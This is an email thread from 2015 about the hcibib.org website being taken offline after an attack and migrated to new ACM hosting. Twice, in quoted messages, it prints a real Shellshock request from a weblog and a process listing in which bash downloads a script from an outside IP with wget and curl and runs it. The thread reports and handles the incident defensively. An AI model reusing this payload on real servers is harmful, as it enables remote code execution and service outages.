weblog for today to your /home/Perlman >>>>> >>>>> The request executed a denial of service attack that started this. >>>>> apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 >>>>> >>>>> Attached is a sample of what was running on the server. >>>>> >>>>> I have changed the default document root of the website until I hear from you. I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine you site and then we can open it back up. Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes. >>>>> >>>>> Thanks >>>>> Adam >>>>> >>>>> >>>>> Adam Greenberg >>>>> Senior Systems Analyst >>>>> Association for Computing Machinery >>>>> 2 Penn Plaza >>>>> Suite 701 >>>>> New York, NY 10121 >>>>> Office: 212-626-0573 >>>>> greenberg@acm.org >>>>> >>>>> >>>> >>>> >>> >>> >> >> -- >> > > -- From greenberg@hq.acm.org Wed May 13 10:43:33 2015 Return-Path: Received: from na01-by2-obe.outbound.protection.outlook.com (mail-by2on0095.outbound.protection.outlook.com [207.46.100.95]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t4DEhWUN015664 for ; Wed, 13 May 2015 10:43:33 -0400 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by CY1PR0501MB1835.namprd05.prod.outlook.com (25.163.141.149) with Microsoft SMTP Server (TLS) id 15.1.154.19; Wed, 13 May 2015 14:43:36 +0000 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id 15.01.0160.009; Wed, 13 May 2015 14:43:37 +0000 From: Adam Greenberg To: Gary PERLMAN CC: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyAAAA8H4AAACiKJwBwd5EAAACnqSAAVoCYgAABa8yQAACgbYAAAGfdAA== Date: Wed, 13 May 2015 14:43:36 +0000 Message-ID: References: , In-Reply-To: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: turing.acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [98.15.179.72] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1835; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1835;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1835; x-forefront-prvs: 0575F81B58 x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6009001)(6019001)(269900001)(377454003)(43234003)(24454002)(479174004)(51704005)(164054003)(13464003)(43544003)(74316001)(102836002)(15975445007)(93886004)(86362001)(92566002)(77156002)(62966003)(15395725005)(2950100001)(2900100001)(40100003)(46102003)(66066001)(189998001)(2656002)(87936001)(76576001)(5890100001)(99286002)(110136002)(5001960100002)(33656002)(54356999)(50986999)(76176999)(19580395003)(19580405001)(122556002)(344275003);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1835;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 13 May 2015 14:43:36.6019 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1835 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by turing.acm.org id t4DEhWUN015664 Status: R X-Status: A X-Keywords: Ok. Let me know what you decide to do with hcibib.org If any DNS changes need to be done for the MX record of hcibib.org I can take care of that. Thanks Adam -----Original Message----- From: Gary PERLMAN [mailto:perlman@turing.acm.org] Sent: Wednesday, May 13, 2015 10:31 AM To: Adam Greenberg Cc: Ken Bauer; ishelpdesk Subject: RE: hcibib.org website problem Thanks, Adam, I too have the same question about the email, but I don't have an answer. I'm quite familiar with the email options in cpanel. I think I can handle the mail forwarding for hcibib.org and will update my @acm.org address. Gary On Wed, 13 May 2015, Adam Greenberg wrote: > Gary, > I made the DNS changes for the website. > > One question, what would you like to do about the email? > > Do you have a gmail address you would like us to point the domain to? And the mail for the @acm.org address that you have going to perlman@turing.acm.org? > You can use the email functionality within the Perlman.hosting.acm.org account. It's configurable in cpanel. > > Let me know. > > Thanks > Adam > > > -----Original Message----- > From: Gary PERLMAN [mailto:perlman@turing.acm.org] > Sent: Wednesday, May 13, 2015 9:32 AM > To: Adam Greenberg > Cc: Ken Bauer; ishelpdesk > Subject: RE: hcibib.org website problem > > I'm ready to go live. I still have some things to fix, but the core funcitonlaity is working. > > Gary > > On Mon, 11 May 2015, Adam Greenberg wrote: > >> Gary, >> I fixed the hosting for you. If you look in cpanel under "Add On Domains" >> I added hcibib.org and mapped it with a document root of >> /public_html/hcibib/ >> >> If you add this entry to your local hosts file >> 216.119.136.18 hcibib.org >> You can hit the site as hcibib.org without us modifying any DNS entries and opening it up right now. >> >> http://hcibib.org/index.html >> >> Once you think it's ready to go, let me know and I can change the DNS entries. >> >> We can leave the files in place on turing for now., that's not a problem. >> >> Thanks >> Adam >> >> -----Original Message----- >> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >> Sent: Monday, May 11, 2015 3:57 PM >> To: Adam Greenberg >> Cc: Ken Bauer; ishelpdesk >> Subject: RE: hcibib.org website problem >> >> I'm getting close. I've transferred a lot of files over to perlman.hosting.acm.org and have made good progress getting things working. I'd like to go live for just my IP: >> 24.48.90.117 >> and I'd like hcibib.org to point to: >> /home/perlman/www/hcibib >> I disabled some scripts I suspect of being vulnerable to a backdoor attack, and I'm going to rework any before I activate them again. >> >> I'd like a few days of testing before opening up hcibib.org from its new home. >> I'd prefer that my old files on turing stick around for a while while I make sure that I've gotten everything. >> >> Gary >> >> On Sat, 9 May 2015, Adam Greenberg wrote: >> >>> Filezilla to Turing is either sftp or ftp server turing.acm.org >>> ports are standard 22 for sftp and 21 for ftp >>> >>> >>> >>> Thanks >>> Adam >>> >>> >>> -------- Original message -------- >>> From: Gary PERLMAN >>> Date: 05/09/2015 10:12 AM (GMT-05:00) >>> To: Adam Greenberg >>> Cc: Ken Bauer , ishelpdesk >>> Subject: RE: hcibib.org website problem >>> >>> File transfer via SSH keeps failing. Do you know what parameters I need to connect to turing with FileZilla? >>> >>> Gary >>> >>> On Sat, 9 May 2015, Adam Greenberg wrote: >>> >>>> Ok. Great. >>>> Let us know if you need any assistance. >>>> >>>> Thanks >>>> Adam >>>> >>>> -----Original Message----- >>>> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >>>> Sent: Saturday, May 09, 2015 9:59 AM >>>> To: Adam Greenberg >>>> Cc: Ken Bauer; ishelpdesk >>>> Subject: RE: hcibib.org website problem >>>> >>>> I am very sorry to have been unwittingly invovled in shutting down acm.org! >>>> >>>> I'm a little embarassed on this, but a move to a new hosting env has been "in the works" since at least last September, when I was given an acocunt (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but I think I can make progress. >>>> >>>> I will work on the file transfers today. >>>> >>>> Gary >>>> >>>> On Sat, 9 May 2015, Adam Greenberg wrote: >>>> >>>>> Ok. What I would like to do then, is move you off of this old turing server and over to our newer hosting environment. >>>>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server. >>>>> Once Gary checks to make sure it works correctly we can cut DNS over. >>>>> There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again. >>>>> On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server. >>>>> >>>>> Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website. >>>>> >>>>> Thanks >>>>> Adam >>>>> >>>>> -----Original Message----- >>>>> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >>>>> Sent: Friday, May 08, 2015 6:50 PM >>>>> To: Adam Greenberg >>>>> Cc: Ken Bauer; ishelpdesk >>>>> Subject: Re: hcibib.org website problem >>>>> >>>>> Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks. >>>>> >>>>> Gary Perlman, Director, HCI Bibliography Project >>>>> mailto:director@hcibib.org http://hcibib.org/ >>>>> >>>>> On Wed, 6 May 2015, Adam Greenberg wrote: >>>>> >>>>>> Hello Gary, >>>>>> I had to take the hcibib.org website offline tonight. The site was used to execute a denial of service attack that took down the server. >>>>>> Here is the reference from the hcibib.org weblogs >>>>>> >>>>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" >>>>>> >>>>>> I put the entire weblog for today to your /home/Perlman >>>>>> >>>>>> The request executed a denial of service attack that started this. >>>>>> apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 >>>>>> >>>>>> Attached is a sample of what was running on the server. >>>>>> >>>>>> I have changed the default document root of the website until I hear from you. I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine you site and then we can open it back up. Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes. >>>>>> >>>>>> Thanks >>>>>> Adam >>>>>> >>>>>> >>>>>> Adam Greenberg >>>>>> Senior Systems Analyst >>>>>> Association for Computing Machinery >>>>>> 2 Penn Plaza >>>>>> Suite 701 >>>>>> New York, NY 10121 >>>>>> Office: 212-626-0573 >>>>>> greenberg@acm.org >>>>>> >>>>>> >>>>> >>>>> >>>> >>>> >>> >>> -- >>> >> >> > > --